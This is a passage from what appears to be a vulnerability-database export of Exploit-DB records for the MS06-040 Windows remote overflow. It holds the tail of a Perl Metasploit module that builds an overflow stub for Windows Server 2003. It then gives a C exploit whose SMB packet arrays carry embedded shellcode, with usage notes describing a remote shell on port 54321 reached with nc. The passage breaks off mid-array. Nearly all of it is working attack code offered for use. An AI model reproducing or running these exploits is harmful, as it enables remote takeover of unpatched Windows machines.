$smb) {\r\n\t\t$self->PrintLine(\"[*] Could not establish SMB session\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $stub;\r\n\r\n\t#\r\n\t# Use the wcscpy() method on Windows Server 2003 SP0\r\n\t#\t\r\n\tif ($target->[0] =~ /2003/) {\r\n\r\n\t\tmy $path = \t\r\n\t\t\t$shellcode.\r\n\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText($target->[1] - length($shellcode)).\r\n\t\t\tPex::Text::AlphaNumText(32).\r\n\t\t\tsubstr($shellcode, 0, 4).\t# cookie\r\n\t\t\tPex::Text::AlphaNumText(4).\r\n\t\t\t# return address == address that store security cookie\r\n\t\t\t(\"\\xec\\xc1\\xc8\\x71\") . \r\n\t\t\tPex::Text::AlphaNumText(8).\r\n\r\n\t\t\t(\"\\xec\\xc1\\xc8\\x71\" x 2) .\r\n\t\t\tPex::Text::AlphaNumText(36).\r\n\r\n\t\t\t# Terminate\r\n\t\t\t\"\\x00\\x00\";\r\n\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\t}\r\n\telse {\r\n\t\t$self->PrintLine(\"This target is not currently supported\");\r\n\t\treturn;\r\n\t}\r\n\r\n\r\n\t$self->PrintLine(\"[*] Sending request...\");\r\n\t\r\n\t# Function 0x1f is not the only way to exploit this :-)\r\n\tmy @response = $dce->request( $handle, 0x1f, $stub );\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] The server rejected it, trying again...\");\r\n\t\t@response = $dce->request( $handle, 0x1f, $stub );\r\n\t}\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] Exploit Failed\");\r\n\t}\r\n\t\r\n\tif (@response) {\r\n\t\t$self->PrintLine('[*] RPC server responded with:');\r\n\t\tforeach my $line (@response) {\r\n\t\t\t$self->PrintLine( '[*] ' . 
$line );\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-09-13]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2355/"}, {"lastseen": "2016-01-31T15:47:28", "bulletinFamily": "exploit", "description": "MS Windows CanonicalizePathName() Remote Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform", "modified": "2006-08-19T00:00:00", "published": "2006-08-19T00:00:00", "id": "EDB-ID:2223", "href": "https://www.exploit-db.com/exploits/2223/", "type": "exploitdb", "title": "Microsoft Windows - CanonicalizePathName Remote Exploit MS06-040", "sourceData": "/*\r\n\r\nMicrosoft Windows CanonicalizePathName() Remote Overflow MSO6-040\r\nMore info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx\r\nWritten by Preddy\r\n\r\nThis is another version of hdm's metasploit version but ported to C,\r\nWorks against Windows XP SP1\r\nAnd it should give a crash on Win2k in services.exe\r\n\r\nOn successfull exploitation it provides a remote shell at port 54321\r\nof your victim:\r\n\r\n./ms06 192.168.1.103\r\nTarget: 192.168.1.103\r\nAttack Finished: now open a new terminal and nc to your victim on port 54321\r\nWarning: Don't close this window!\r\n\r\n[open a new terminal/window/prompt]\r\n\r\nnc 192.168.1.103 54321\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>\r\n\r\nhttp://www.team-rootshell.com\r\n\r\nGreetz to all of my friends at:\r\n\r\nFREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor\r\nMILW0RM(ABS.lcirc.net): #milw0rm\r\nSTS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal)\r\nPTP(irc.eu.pulltheplug.org): #aso,#Social\r\nGSO(gso.eclipticx.net): 
#gso-chat\r\nTTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php\r\nSSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan\r\n\r\nRootshell Security Group and everyone else ^^\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <stdarg.h>\r\n#include <sys/mman.h>\r\n\r\n#define PORT 139\r\n\r\nchar peer0_0[] = {\r\n0x81, 0x00, 0x00, 0x44, 0x20, 0x43, 0x4b, 0x46, \r\n0x44, 0x45, 0x4e, 0x45, 0x43, 0x46, 0x44, 0x45, \r\n0x46, 0x46, 0x43, 0x46, 0x47, 0x45, 0x46, 0x46, \r\n0x43, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00 };\r\n\r\nchar peer0_1[] = {\r\n0x00, 0x00, 0x00, 0x54, 0xff, 0x53, 0x4d, 0x42, \r\n0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x00, 0x84, 0xec, 0x00, 0x31, 0x00, 0x02, \r\n0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \r\n0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, \r\n0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4e, 0x54, \r\n0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, \r\n0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, \r\n0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 };\r\n\r\nchar peer0_2[] = {\r\n0x00, 0x00, 0x00, 0xb5, 0xff, 0x53, 0x4d, 0x42, \r\n0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x00, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, \r\n0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, \r\n0x00, 
0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x5c, 0xd0, 0x00, 0x80, 0x7a, 0x00, 0x60, \r\n0x55, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, \r\n0x02, 0xa0, 0x4b, 0x30, 0x49, 0xa0, 0x0e, 0x30, \r\n0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, \r\n0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x37, 0x04, \r\n0x35, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, \r\n0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, \r\n0x00, 0x09, 0x00, 0x09, 0x00, 0x20, 0x00, 0x00, \r\n0x00, 0x0c, 0x00, 0x0c, 0x00, 0x29, 0x00, 0x00, \r\n0x00, 0x57, 0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, \r\n0x55, 0x50, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x54, \r\n0x41, 0x54, 0x49, 0x4f, 0x4e, 0x31, 0x57, 0x69, \r\n0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, \r\n0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, \r\n0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, \r\n0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, \r\n0x00 };\r\n\r\nchar peer0_3[] = {\r\n0x00, 0x00, 0x01, 0x04, 0xff, 0x53, 0x4d, 0x42, \r\n0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, \r\n0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x5c, 0xd0, 0x00, 0x80, 0xc9, 0x00, 0xa1, \r\n0x81, 0xa3, 0x30, 0x81, 0xa0, 0xa2, 0x81, 0x9d, \r\n0x04, 0x81, 0x9a, 0x4e, 0x54, 0x4c, 0x4d, 0x53, \r\n0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x40, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x58, 0x00, 0x00, 0x00, 0x12, \r\n0x00, 0x12, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x82, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x02, 0x08, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, \r\n0x05, 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x25, 0xa6, 0x9f, 0x80, 
0x96, \r\n0x31, 0x6c, 0xca, 0xa0, 0x08, 0x9f, 0x12, 0x7e, \r\n0x47, 0xcd, 0x45, 0x10, 0x25, 0x39, 0x7d, 0xf8, \r\n0x55, 0x66, 0x03, 0x57, 0x00, 0x4f, 0x00, 0x52, \r\n0x00, 0x4b, 0x00, 0x47, 0x00, 0x52, 0x00, 0x4f, \r\n0x00, 0x55, 0x00, 0x50, 0x00, 0x57, 0x00, 0x4f, \r\n0x00, 0x52, 0x00, 0x4b, 0x00, 0x53, 0x00, 0x54, \r\n0x00, 0x41, 0x00, 0x54, 0x00, 0x49, 0x00, 0x4f, \r\n0x00, 0x4e, 0x00, 0x31, 0x00, 0x57, 0x69, 0x6e, \r\n0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, \r\n0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, \r\n0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, \r\n0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 };\r\n\r\nchar peer0_4[] = {\r\n0x00, 0x00, 0x00, 0x3a, 0xff, 0x53, 0x4d, 0x42, \r\n0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x04, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x01, 0x00, 0x0f, 0x00, 0x00, \r\n0x5c, 0x5c, 0x5c, 0x49, 0x50, 0x43, 0x24, 0x00, \r\n0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 };\r\n\r\nchar peer0_5[] = {\r\n0x00, 0x00, 0x00, 0x5c, 0xff, 0x53, 0x4d, 0x42, \r\n0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x18, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, \r\n0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, \r\n0x02, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x5c, \r\n0x42, 0x52, 0x4f, 0x57, 0x53, 0x45, 0x52, 0x00 };\r\n\r\nchar peer0_6[] = {\r\n0x00, 0x00, 0x00, 0x92, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x48, 
\r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 0x00, 0x48, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x4f, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x16, \r\n0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, \r\n0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, \r\n0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, \r\n0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, \r\n0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, \r\n0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };\r\n\r\nchar peer0_7[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, \r\n0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, \r\n0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, \r\n0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, \r\n0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, \r\n0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, \r\n0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, \r\n0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, \r\n0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, \r\n0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, \r\n0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 
\r\n0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, \r\n0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, \r\n0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, \r\n0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, \r\n0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, \r\n0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, \r\n0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, \r\n0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, \r\n0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, \r\n0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, \r\n0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, \r\n0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, \r\n0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, \r\n0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, \r\n0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, \r\n0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, \r\n0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, \r\n0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, \r\n0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, \r\n0x7c, 0x45, 0x8e };\r\n\r\nchar peer0_8[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, \r\n0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, \r\n0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, \r\n0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, \r\n0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, \r\n0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, \r\n0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, \r\n0x8f, 0x45, 0x49, 
0xb5, 0x60, 0xc8, 0x40, 0x88, \r\n0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, \r\n0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, \r\n0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, \r\n0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, \r\n0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, \r\n0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, \r\n0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, \r\n0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, \r\n0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, \r\n0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, \r\n0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, \r\n0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, \r\n0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, \r\n0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, \r\n0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, \r\n0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, \r\n0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, \r\n0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, \r\n0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, \r\n0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, \r\n0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, \r\n0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, \r\n0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, \r\n0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, \r\n0x52, 0x66, 0x79 };\r\n\r\nchar peer0_9[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, \r\n0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 
0x68, \r\n0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, \r\n0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, \r\n0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, \r\n0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, \r\n0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, \r\n0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, \r\n0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, \r\n0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, \r\n0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, \r\n0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, \r\n0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, \r\n0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, \r\n0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, \r\n0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, \r\n0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, \r\n0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, \r\n0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, \r\n0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, \r\n0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, \r\n0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, \r\n0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, \r\n0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, \r\n0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, \r\n0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, \r\n0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, \r\n0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, \r\n0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, \r\n0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, \r\n0x00, 0x00, 0x00 };\r\n\r\nchar peer0_10[] = {\r\n0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, \r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 
0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, \r\n0x00, 0x00 };\r\n\r\nchar peer0_11[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, \r\n0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 